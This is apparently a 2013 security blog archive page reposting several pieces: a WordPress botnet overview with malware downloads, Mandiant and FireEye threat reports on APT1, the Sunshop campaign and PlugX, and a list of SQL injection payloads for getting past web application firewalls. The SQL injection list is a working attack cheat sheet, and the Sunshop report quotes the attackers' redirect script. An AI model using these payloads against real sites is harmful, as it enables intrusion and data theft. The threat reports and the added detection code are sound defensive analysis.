Monthly Archives: May 2013

DeepEnd Research: Under this rock… Vulnerable WordPress/Joomla sites… Overview of the RFI botnet malware arsenal


Exploits directed at WordPress and Joomla content management systems (CMS) have increased at a dramatic rate over the past year, and blogs and forums are flooded with posts about hacked CMS installations. Popular jargon calls the attackers "hackers", but it is generally understood that these mass compromises are performed by automated scanners and tools. We believe, however, that the actual malware involved has received too little coverage.

One such infection scheme is essentially the following:

A downloader trojan (Mutopy, Win32; 20a6ebf61243b760dd65f897236b6ad3, VirusTotal) instructs the infected host to download:
1) the remote file injector "Symmi" (Win32), 7958f73daf4b84e3b00e008258ea2e7a (VirusTotal)
2) SDbot (Win32), aaee52bfb589f6534c4b51e3b144dc08 (VirusTotal)
3) PHP scripts for injection into compromised WordPress sites. Among them is a PHP spambot (victimized site owners are often alerted to the copious pharmaceutical and porn spam emanating from their sites). It is also the source of the varied spam links: thousands of different URLs that all redirect to the same destinations (e.g. weight-loss, work-at-home scams, or porn sites).

Read more at DeepEnd Research>>>

Download files (see below)



Download the malware files (email me if you need the password)
Download the pcap files (email me if you need the password)


Wordpress_PHP_1FFD37807740EBCB7DAD044ACF866100_up.php 1ffd37807740ebcb7dad044acf866100
Wordpress_PHP_5F0BB0851B3A2838C34CF21400F22A7E_copy.php 5f0bb0851b3a2838c34cf21400f22a7e
Wordpress_PHP_7CCDCC3FF09262CAFE5DC953C0552254_seek.cgi 7ccdcc3ff09262cafe5dc953c0552254
Wordpress_PHP_9B6D87C50B58104E204481C580E630F1_sm14e.php 9b6d87c50b58104e204481c580e630f1
Wordpress_PHP_35DBB397351622B86E421EE8ABA095DE_fu.php 35dbb397351622b86e421ee8aba095de
Wordpress_PHP_45B02538063124A0FECC0987410B1A65_ru.php 45b02538063124a0fecc0987410b1a65
Wordpress_PHP_821BB092136A73EAA2CA803E6DBB658A_del.php 821bb092136a73eaa2ca803e6dbb658a

Wordpress-Mutopy_20A6EBF61243B760DD65F897236B6AD3.exe_ 20a6ebf61243b760dd65f897236b6ad3
Wordpress_DroppedbyMutopy_93F2D4ED74F7CCBF8E41F4D9D0B3BF98_Twain002.Mtx_ 93f2d4ed74f7ccbf8e41f4d9d0b3bf98
Wordpress_SDbot_AAEE52BFB589F6534C4B51E3B144DC08_svchost.exe_ aaee52bfb589f6534c4b51e3b144dc08
Worpress_Symmi_7958F73DAF4B84E3B00E008258EA2E7A_conhost.exe_ 7958f73daf4b84e3b00e008258ea2e7a

Whonix OS – A complete anonymous TOR OS



About Whonix OS:

Whonix is a general-purpose operating system built from VirtualBox, Debian GNU/Linux and Tor. It is designed so that IP and DNS leaks are not possible: even malware with administrative rights cannot find out the user's real IP address and location.




 (Image: GUI Desktop whonix OS)


This works by running two virtual machines: one runs Tor and acts as the gateway, the other is the isolated Whonix workstation, which has no direct route to the network and can only reach it through the gateway.





Whonix is built around the Tor anonymity network. As it is still in beta, some bugs and virtualization issues may be found.


Screenshots of WHONIX OS:



(Image: Tor Browser configured for anonymous browsing)



(Image: Flash leak test conducted for complete anonymity verification)





Some of the best features of Whonix OS are that it can run Flash and Java applets anonymously, and that it hides from sites tracking you the fact that you are using Tor. You can download this Tor-powered Whonix OS from the link below.


 WHONIX OS <<DOWNLOAD LINK>>


If you are a first-time user, the default credentials are: USERNAME: user / PASSWORD: changeme


source :  http://hackersmeet.blogspot.in

APT1 Three Months Later – Significantly Impacted, Though Active & Rebuilding

On 18 February 2013, Mandiant released a report exposing one of China's cyber espionage units. The group, which Mandiant calls APT1, is one of the most prolific we track in terms of the sheer quantity of information it has stolen. The scale and impact of APT1's operations compelled us to write the report and release more than 3,000 Indicators to help organizations defend against APT1's tactics. The report linked APT1 to a unit within China's People's Liberation Army and received widespread attention from the media and from the U.S. government.

Three months later, Mandiant has observed a decrease in APT1's operations. However, we can confirm that APT1 continues cyber espionage operations against targeted computer networks. While Mandiant's APT1 report seems to have affected APT1 operations, APT1 is still active using a well-coordinated and well-defined attack methodology against a wide set of industries -- with a discernible post-report shift towards new tools and infrastructure.

Mandiant's report and the simultaneous release of 3,000+ indicators hindered APT1's operations by causing the group to retool and change some operational methodology. Since the report, APT1 has stopped using the vast majority of the infrastructure that was disclosed with the release of the indicators. However, APT1 maintained an extensive infrastructure of computer systems around the world, and it is highly likely that APT1 still maintains access to those systems or has utilized those systems to establish new attack infrastructure in the last three months.

One thing that has not changed is the activity level of many of the 20+ Advanced Persistent Threat (APT) groups of suspected Chinese origin that Mandiant tracks. These groups are still very active and Mandiant has observed no significant changes in their operations after the release of the APT1 report. These groups also conduct cyber espionage campaigns against a broad range of victims and, based on Mandiant's observations, they were not directly affected by the release of the Mandiant APT1 report.

The discovery and attribution of APT1 to China's 2nd Bureau of the People's Liberation Army (PLA) General Staff Department's (GSD) 3rd Department (Military Unit Cover Designator 61398) also elevated the public dialogue about cyber espionage and the theft of intellectual property to a level not seen before. President Obama's National Security Advisor, Thomas Donilon, said that cyber espionage has moved to the "forefront" of the US agenda in its relationship with China and called for the Chinese Government to stop the hacking and to join an international process for limiting economic espionage.

Congress is taking action as well. Earlier this month, Senators Levin, McCain, Coburn and Rockefeller introduced S. 884, the Deter Cyber Theft Act, which would require the Government to publish an annual report listing foreign countries that engage in economic espionage and block imports from those countries made with stolen technologies. This bill is designed to be that next step not only to "name and shame" the bad actors but also to punish them economically.

The subject of Chinese attacks, such as those conducted by APT1, seems poised to stay front and center on the diplomatic agenda where, according to the New York Times, it will be a "central issue in an upcoming visit to China by President Obama's national security adviser, Thomas Donilon."

Ready for Summer: The Sunshop Campaign

FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, and the recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims, judging by the use of the Internet Explorer zero-day and the volume of requests observed to the exploit server. The attack was likely executed by an actor we have named the 'Sunshop Group', which was also responsible for the 2010 compromise of the Nobel Peace Prize website that leveraged a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious JavaScript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised websites was running Internet Explorer 8 on Windows XP (Windows NT 5.1) with an English user language, the malicious JavaScript redirected them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Every other visitor was redirected to a page that downloaded two malicious jars (the branches marked //J in the redirector code):

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)
{
    if(sys_Version=="WindowsNT5.1")
    {
        showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxximg.html");
    }
    else
        showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html");//J
}
else
    showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html");//J

Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The java exploits were packaged as two different jar files. One jar file had a MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had a MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with a MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with a MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to 58.64.205.53. We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research into 58.64.205.53 with our friends at Mandiant we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain of nameserver1[.]zapto[.]org resolved to the same 58.64.205.53 IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Host: update.microsoft.com
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.
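As an added example (not code from the FireEye post), the following Python function parses a captured request such as the Briba beacon above and lists the traits that make it worth a second look: a Host header naming a domain other than the one the connection actually went to, plaintext HTTP to port 443, the POST to /index<digits>.asp, and the odd content headers. The request bytes are those quoted above; the destination host and port come from the post's description of the traffic; the trait names, the thresholds and the benign comparison request are my own assumptions.

```python
import re

# The Briba beacon quoted above, reassembled as raw bytes the sample sent to
# nameserver1[.]zapto[.]org on port 443 (per the analysis) while claiming to talk
# to update.microsoft.com.
BRIBA_BEACON = (
    "POST /index000001021.asp HTTP/1.1\r\n"
    "Accept-Language: en-us\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)\r\n"
    "Host: update.microsoft.com\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 000041\r\n"
    "\r\n"
)

# Assumed pattern for the IndexASP-style beacon path (index + digits + .asp).
INDEX_ASP = re.compile(r"^/index\d+\.asp$", re.I)


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, version and a header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def beacon_indicators(raw, dst_host, dst_port, tls=False):
    """Return the suspicious traits found in one request.

    dst_host/dst_port are where the TCP connection really went (from DNS or
    flow logs); tls says whether the bytes were carried inside a TLS session.
    """
    req = parse_request(raw)
    h = req["headers"]
    hits = []
    host = h.get("host", "").split(":")[0].lower()
    if host and host != dst_host.lower():
        hits.append("host_header_mismatch")        # Host: says one thing, the socket another
    if dst_port == 443 and not tls:
        hits.append("plaintext_http_on_443")       # HTTP in the clear on the HTTPS port
    if req["method"] == "POST" and INDEX_ASP.match(req["path"]):
        hits.append("index_asp_post")
    if req["method"] == "POST" and h.get("content-type", "").startswith("text/html"):
        hits.append("post_body_declared_as_html")  # browsers do not POST text/html bodies
    length = h.get("content-length", "")
    if length.isdigit() and length != str(int(length)):
        hits.append("zero_padded_content_length")  # "000041" is not what an HTTP stack emits
    return hits


if __name__ == "__main__":
    for trait in beacon_indicators(BRIBA_BEACON, "nameserver1.zapto.org", 443):
        print(trait)
```

Run against the Briba request the function returns all five traits; the same bytes sent over TLS to the real update.microsoft.com would still trip the path and header checks, which is the point: the Host header alone proves nothing, so pair it with where the connection actually went.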

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had a MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same 58.64.205.53 IP between April 2nd and 8th.

Attribution

The Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar tactics include the use of zero-day exploits, strategic web compromise as well as Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee's website in 2010. This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.

Malware

CVE            Exploit hash                      Payload hash                      Malware family  C&C host                      C&C IP
CVE-2013-1347  fb24c49299b197e1b56a1a51430aea26  b0ef2ab86f160aa416184c09df8388fe  9002            dns[.]homesvr[.]tk            58.64.205.53
CVE-2013-2423  f4bee1e845137531f18c226d118e06d7  d99ed31af1e0ad6fb5bf0f116063e91f  9002            asp[.]homesvr[.]linkpc[.]net  58.64.205.53
CVE-2013-1493  3fbb7321d8610c6e2d990bb25ce34bec  42bd5e7e8f74c15873ff0f4a9ce974cd  9002            ssl[.]homesvr[.]tk            58.64.205.53
Unknown        Unknown                           6fe0f6e68cd9cc6ed7e100e7b3626665  Briba           nameserver1[.]zapto[.]org     58.64.205.53
CVE-2013-1493  51aff823274e9d12b1a9a4bbbaf8ce00  2b6605b89ead179710565d1c2b614665  Poison Ivy      9ijhh45[.]zapto[.]org         58.64.205.53

WAF Bypass Sql Injection Tips

This is for those who already know SQL injection. Sometimes you get a 403 Forbidden or 406 Not Acceptable error; that is the WAF (web application firewall) blocking the request, and you can often get past it with the query variants below. If you don't know SQL injection yet, you can learn it HERE.
ORDER BY not working?
You can simply bypass it by using GROUP BY instead of ORDER BY.
UNION SELECT bypassing:

union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
id=1+'UnI"On'+'SeL"ECT'   <- MySQL only
id=1+'UnI'||'on'+SeLeCT'   <- MSSQL only

AND bypassing, appended after the id value (e.g. id=1+/*!and*/+1=0):

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
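As an added illustration (not part of the original post), the following Python script runs several of the listed UNION SELECT variants through two detection approaches: a naive rule that looks for the literal tokens in the raw parameter, and one that first normalizes the parameter to roughly what MySQL's parser will see (repeated percent-decoding, unwrapping /*!...*/ version comments, treating ordinary and line comments as whitespace, collapsing whitespace). The payload list is copied from above; the normalizer and the keyword-stripping sanitizer are my own sketches for the example, not any real WAF's logic.

```python
import re
from urllib.parse import unquote

# Variants copied from the list above. They all mean UNION SELECT to MySQL.
BYPASSES = [
    "/*!50000union*/+/*!50000select*/",
    "+union+distinct+select+",
    "+union+distinctROW+select+",
    "union+/*!select*/+1,2,3",
    "union/**/select/**/1,2,3",
    "uni%20union%20/*!select*/%20",
    "/**//*!union*//**//*!select*//**/",
    "union%23aa%0Aselect",
    "/**/union/*!50000select*/",
    "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/",
]

# Hypothetical WAF rule: literal "union select" separated by whitespace.
NAIVE_RULE = re.compile(r"\bunion\s+select\b", re.I)
# Same idea applied after normalization, allowing the ALL/DISTINCT(ROW) forms.
UNION_SELECT = re.compile(r"\bunion\b(\s+(all|distinct|distinctrow))?\s+select\b", re.I)


def naive_waf(query):
    """Match the token sequence in the raw request parameter."""
    return bool(NAIVE_RULE.search(query))


def normalize(query):
    """Reduce a request parameter to roughly what MySQL's parser will see."""
    prev = None
    while prev != query:                       # undo repeated encoding (%252f -> %2f -> /)
        prev, query = query, unquote(query)
    query = query.replace("+", " ")            # form encoding of a space
    query = re.sub(r"/\*!\d*", " ", query)     # MySQL executes the body of /*!50000 ... */
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)  # plain comments act as whitespace
    query = query.replace("*/", " ")           # closers left over from unwrapped version comments
    query = re.sub(r"(#|-- )[^\n]*", " ", query)          # line comments run to end of line
    return re.sub(r"\s+", " ", query).strip()


def normalized_waf(query):
    """Match after normalization instead of on the raw bytes."""
    return bool(UNION_SELECT.search(normalize(query)))


def strip_keywords(query):
    """A sanitizer that deletes the keywords; UNIunionON+SELselectECT is built to survive it."""
    return re.sub(r"union|select", "", query, flags=re.I)


if __name__ == "__main__":
    for p in BYPASSES:
        print(f"{p:48} naive={naive_waf(p)!s:5} normalized={normalized_waf(p)}")
    print(strip_keywords("UNIunionON+SELselectECT"))
```

The naive rule misses every variant in the list while the normalized one catches all of them, and the keyword-stripping sanitizer turns UNIunionON+SELselectECT into UNION+SELECT by itself. The lesson for the defending side is the mirror image of the bypass list: match on what the database will parse, never on the raw bytes, and never "fix" input by deleting substrings.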
Falsifying the URL (so the original row is not returned):

id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select
Bypassing filters on table and column enumeration:

/*!table_name*/
+from /*!information_schema*/./*!tables*/ where table_schema=database()
unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

Wrap the column you are selecting with:

convert(<column> using ascii)
unhex(hex(<column>))
If ascii doesn't work, try one of these character sets in its place:

ujis, ucs2, tis620, swe7, sjis, macroman, macce, latin7, latin5, latin2, koi8u, koi8r, keybcs2, hp8, geostd8, gbk, gb2312, armscii8, ascii, binary, cp1250, big5, cp1251, cp1256, cp1257, cp850, cp852, cp866, cp932, dec8, euckr, latin1, utf8
source :  http://hack2play.blogspot.com 

Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick

FireEye Labs has discovered a targeted attack against Chinese political rights activists. The targets appear to be members of social groups involved in the political rights movement in China. The email surfaced in the wake of the attention given to Beijing during the 12th National People's Congress and the 12th National Committee of the Chinese People's Political Consultative Conference, the sessions that elect a new core leadership for the Chinese government and set the direction of China's five-year development plan [1].

The email contains a weaponized attachment that uses the CVE-2012-0158 Office exploit to drop the benign payload components and a decoy document. The PlugX Remote Access Tool (RAT) is itself known for being assembled from benign files that together produce the malicious execution. The Microsoft file OInfoP11.exe, also known as "Office Data Provider for WBEM", is a signed file listed in NIST's National Software Reference Library and is a component of the Microsoft Office 2003 suite; endpoint protection that relies on integrity checking would deem it a valid, clean file. On Windows 7 and later, the svchost.exe stage requires user interaction in the form of a UAC prompt, but only if UAC is enabled; on Windows XP the attack requires no user interaction at all. The major problem is that this file is subject to DLL sideloading. In previous cases PlugX has used similarly sideloading-prone files, such as the McAfee binary mcvsmap.exe [2], Intel's hkcmd.exe [3] and NVIDIA's NvSmart.exe [4]. In this case OInfoP11.exe loads a DLL named OInfo11.ocx (a payload loader posing as an ActiveX DLL) that decompresses and decrypts the malicious payload OInfo11.ISO. This technique can be used to evade endpoint security solutions that rely on binary signing, and traditional anti-virus (AV) solutions have a hard time identifying the encrypted and compressed payload. At the time of writing, only 1 of 46 AV vendors detects the OInfo11.ocx file.

The diagram in figure 1 shows the behavior and relationship of these files.

Figure 1: Attack Diagram

Infiltration

In Figure 2, the targeted email advertises a suffrage movement seminar event. Figure 3 is the contents of the Google document form link that contains the same information as in the email. In figure 4, the decoy document contains the details of the particular seminar section mentioned in the Google document link.

Figure 2: Original Email

Below is the English translation of the email in figure 2.

Li Ping

Figure 3: Google Form

Decoy Document

Figure 4: Decoy Document

Below is the translation of the document shown above.

The seminar

Attack Analysis

The XLS file (1146fdd6b579ac7144ff575d4d4fa28d) uses the CVE-2012-0158 Office exploit to drop the "ews.exe" payload and the decoy document shown in figure 4. This payload extracts the Microsoft file OINFOP11.exe, the benign DLL OInfo11.ocx, and the encoded and compressed shellcode sections in OInfo11.ISO. OInfoP11.exe loads OInfo11.ocx as a DLL; once loaded, the DLL decompresses OInfo11.ISO with RtlDecompressBuffer, decrypts it and runs it in memory. The malicious code is never written to the file system and is therefore not seen by file-system-based anti-virus scanners. Figure 5 shows a high-level view of the relationship between the dropped files.

Figure 5: Payload Relationship

Summary of Dropped Files

Name          MD5                               Location(s)                                Type         Encoded/Encrypted  Compressed
Ews.exe       721cca40df0f7eab5b5cb069ee8fda9d  %TEMP%                                     Exe          -                  -
OINFOP11.EXE  a31cad2960a660cb558b32ba7236b49e  %TEMP%\RarSFX0\, %ALLUSERSPROFILE%\SXS\    Exe (clean)  -                  -
OInfo11.ocx   b355dedbabb145bbf8dd367adac4f8c5  %TEMP%\RarSFX0\, %ALLUSERSPROFILE%\SXS\    Binary file  Yes                -
OInfo11.ISO   128e3fc5ffba06abdd3edab2aff3753f  %TEMP%\RarSFX0\, %ALLUSERSPROFILE%\SXS\    Binary file  Yes                Yes

Exploit Details

This malware uses CVE-2012-0158 to drop the payload from the section shown in Figure 6.

Figure 6: Exploit Payload Section

Shellcode can be found in the first few bytes of this section. Figure 7 shows the disassembly of the code found at the 0x1de0b offset shown in figure 6.

Figure 7: Payload Shellcode

Campaign Characteristics

OInfoP11.exe is a valid Microsoft file and its certificate is shown in figure 8.

Figure 8: Signature Usage

When OInfoP11.exe is invoked with the command line "C:\Documents and Settings\All Users\SxS\OINFOP11.EXE" 200 0, it begins loading the file OInfo11.ocx.

Figure 10: Loader Entrypoint

The arrow marks the jump to the entry point of the shellcode that decompresses and decrypts the ISO file.

Figure 11: Shellcode Example

This is an example of the memory space of the loaded benign DLL OInfo11.ocx. OInfo11.ocx is essentially a loader: this section decompresses and decrypts the malicious payload in memory.

Figure 12: Decryption of the ISO file

This is the decryption loop used throughout the sample. In this instance it is used to decrypt the ISO shellcode in memory.

Figure 13: DLL location in memory

This is an example of the complete malicious DLL address space in memory.

Entrenchment

Artifacts to watch for:

Mutex                  \BaseNamedObjects\oleacc-msaa-loaded
                       DoInstPrepare
Registry key (adds)    \REGISTRY\MACHINE\Software\CLASSES\FAST
                       \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
                       \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
Registry key (sets)    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
Files/folders (hidden) %ALLUSERSPROFILE%\SXS\
                       %ALLUSERSPROFILE%\SXS\OInfo11.ocx
                       %ALLUSERSPROFILE%\SXS\OInfo11.ISO
                       %ALLUSERSPROFILE%\SXS\OINFOP11.EXE

Injection

The DLL injects code into svchost.exe: it allocates memory in the target with VirtualAllocEx, writes the code there with WriteProcessMemory, and then resumes the thread so the injected code runs. The same injection routine is used for both svchost.exe and msiexec.exe. When svchost.exe spawns msiexec.exe it calls CreateEnvironmentBlock and CreateProcessAsUser so that the svchost service can launch the process in a user session.

Keylogging Activity

Creates a keylogging file in %ALLUSERSPROFILE%\SXS\ named NvSmart.hlp.

(Image: example content of the keylog file)

Proxy Establishment

This sample can communicate using ICMP, UDP, HTTP and TCP. In this case the configuration string Protocol:[ TCP], Host: [202.69.69.41:90], Proxy: [0::0::] selects the transport, the C&C host and the proxy used for the C&C communication.
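As an added example (not code from the FireEye write-up), the following Python script turns the artifacts listed above into hunting rules and runs them over a handful of constructed, Sysmon-style events, and also parses the C&C configuration string into its fields. The file names, mutex, registry key, command-line arguments and configuration string are the ones reported above; the event shape, the "trusted directory" list and the benign baseline path are assumptions made for the example.

```python
import re
from ntpath import basename, dirname  # Windows-style path handling on any host

# Indicators taken from the analysis above.
SIDELOAD_HOST = "OINFOP11.EXE"
MUTEX = r"\BaseNamedObjects\oleacc-msaa-loaded"
REG_KEY = r"\REGISTRY\MACHINE\Software\CLASSES\FAST"
# Assumption for the example: where a signed Microsoft binary is expected to live.
TRUSTED_DIRS = (r"c:\program files", r"c:\windows")

# Regex for the configuration string format quoted above:
#   Protocol:[ TCP], Host: [202.69.69.41:90], Proxy: [0::0::]
CFG_RE = re.compile(
    r"Protocol:\[\s*(?P<proto>\w+)\s*\],\s*Host:\s*\[(?P<host>[^\]:]+):(?P<port>\d+)\],"
    r"\s*Proxy:\s*\[(?P<proxy>[^\]]*)\]"
)


def parse_cnc_string(text):
    """Return protocol/host/port/proxy from a PlugX-style configuration string, or None."""
    m = CFG_RE.search(text)
    if not m:
        return None
    return {"protocol": m["proto"], "host": m["host"], "port": int(m["port"]), "proxy": m["proxy"]}


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def hunt(events):
    """Return (rule, detail) pairs for every event that matches a PlugX trait."""
    hits = []
    for e in events:
        kind = e["type"]
        if kind == "process" and basename(e["image"]).upper() == SIDELOAD_HOST:
            if not in_trusted_dir(e["image"]):
                hits.append(("sideload_host_outside_install_dir", e["image"]))
            if e.get("cmdline", "").rstrip().endswith(" 200 0"):
                hits.append(("sideload_host_args_200_0", e["cmdline"]))
        elif kind == "imageload":
            # Unsigned DLL loaded from the same directory as a signed host, outside the
            # install tree: the general shape of DLL sideloading, not just this sample.
            same_dir = dirname(e["image"]).lower() == dirname(e["loaded"]).lower()
            if e.get("signed_host") and not e.get("signed_dll") and same_dir \
                    and not in_trusted_dir(e["loaded"]):
                hits.append(("unsigned_dll_beside_signed_host", e["loaded"]))
        elif kind == "mutex" and e["name"] == MUTEX:
            hits.append(("plugx_mutex", e["name"]))
        elif kind == "registry" and e["key"].lower() == REG_KEY.lower():
            hits.append(("plugx_registry_key", e["key"]))
    return hits


# Constructed sample events (Sysmon-like shape; not from the original analysis).
SXS = r"C:\Documents and Settings\All Users\SxS"
SAMPLE_EVENTS = [
    {"type": "process", "image": SXS + r"\OINFOP11.EXE",
     "cmdline": '"' + SXS + r'\OINFOP11.EXE" 200 0'},
    {"type": "imageload", "image": SXS + r"\OINFOP11.EXE", "loaded": SXS + r"\OInfo11.ocx",
     "signed_host": True, "signed_dll": False},
    {"type": "mutex", "name": MUTEX},
    {"type": "registry", "key": REG_KEY, "op": "add"},
    # Benign baseline: same binary from an assumed Office install path, ordinary arguments.
    {"type": "process", "image": r"C:\Program Files\Microsoft Office\OFFICE11\OINFOP11.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\OFFICE11\OINFOP11.EXE"'},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:36} {detail}")
    print(parse_cnc_string("Protocol:[ TCP], Host: [202.69.69.41:90], Proxy: [0::0::]"))
```

The signed-host/unsigned-DLL rule is the durable one: the mutex, registry key and file names change between PlugX builds, but a signed executable running from a user-writable directory and loading an unsigned DLL that sits next to it is the sideloading pattern itself.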

Figure 14: Communication Options

Modes of Operation Overview

The table below outlines some of the functionality this variant uses. The options have not changed, so the table serves as a refresher. Figure 15 shows an example of how these functions are called by the sample.

Mode      Description
Disk      Access disk drives to modify files
Nethood   List shares
Netstat   List TCP/UDP connections
Option    Send system commands to the workstation, such as screen lock
PortMap   Port mapping
Process   Modify the state of processes
RegEdit   Modify registry keys
Service   Modify services
Shell     Communicate through the established named pipe to the C&C server
SQL       SQL database queries
Telnet    Start a telnet server on the victim

Figure 15: Functionality Example

C&C Details and Communication

In figure 16, the sample is communicating with 202.69.69.41 over port 90. The C&C node was down at the time of analysis; the protocol is a custom, non-HTTP one. An example of the callback content is shown in figure 17. This sample will also try to communicate laterally with other instances on the same network; an example of that traffic and its content can be seen in figures 18 and 19.

Figure 16: PCAP of C&C communication

Figure 17: Callback Traffic

Figure 18: UDP Beacon

Figure 19: UDP packet content

Whois Information on the IP 202.69.69.41

inetnum:      202.69.68.0 - 202.69.71.255
netname:      NEWTT-AS-AP
descr:        Wharf T&T Limited
descr:        11/F, Telecom Tower,
descr:        Wharf T&T Square, 123 Hoi Bun Road
descr:        Kwun Tong, Kowloon
country:      HK
admin-c:      EN62-AP
tech-c:       BW128-AP
mnt-by:       APNIC-HM
mnt-lower:    MAINT-HK-NEWTT
mnt-routes:   MAINT-HK-NEWTT
mnt-irt:      IRT-NEWTT-HK
status:       ALLOCATED PORTABLE
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks:      This object can only be updated by APNIC hostmasters.
remarks:      To update this object, please contact APNIC
remarks:      hostmasters and include your organisation's account
remarks:      name in the subject line.
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed:      hm-changed@apnic.net 20120725
source:       APNIC

person:       Eric Ng
nic-hdl:      EN62-AP
remarks:      please report spam or abuse to abuse@wharftt.com
e-mail:       abuse@wharftt.com
e-mail:       ericng@wharftt.com
address:      11/F Telecom Tower, Wharf T&T Square
address:      123 Hoi Bun Road, Kwun Tong,
phone:        +852-2112-2653
fax-no:       +852-2112-7883
country:      HK
changed:      ericng@wharftt.com 20070716
mnt-by:       MAINT-NEW
source:       APNIC

person:       Benson Wong
nic-hdl:      BW128-AP
e-mail:       abuse@wharftt.com
address:      5/F, Harbour City, Kowloon,
address:      Hong Kong
phone:        +852-21122651
fax-no:       +852-21127883
country:      HK
changed:      bensonwong@wharftt.com 20070420
mnt-by:       MAINT-HK-NEWTT
source:       APNIC

I want to thank the FireEye Labs Team.

[1] http://rmqlxk.blogspot.com/2013/03/blog-post_15.html

[2] http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

[3] http://lastline.com/an-analysis-of-plugx.php

[4] http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/

A Saudi Arabia Telecom’s Surveillance Pitch

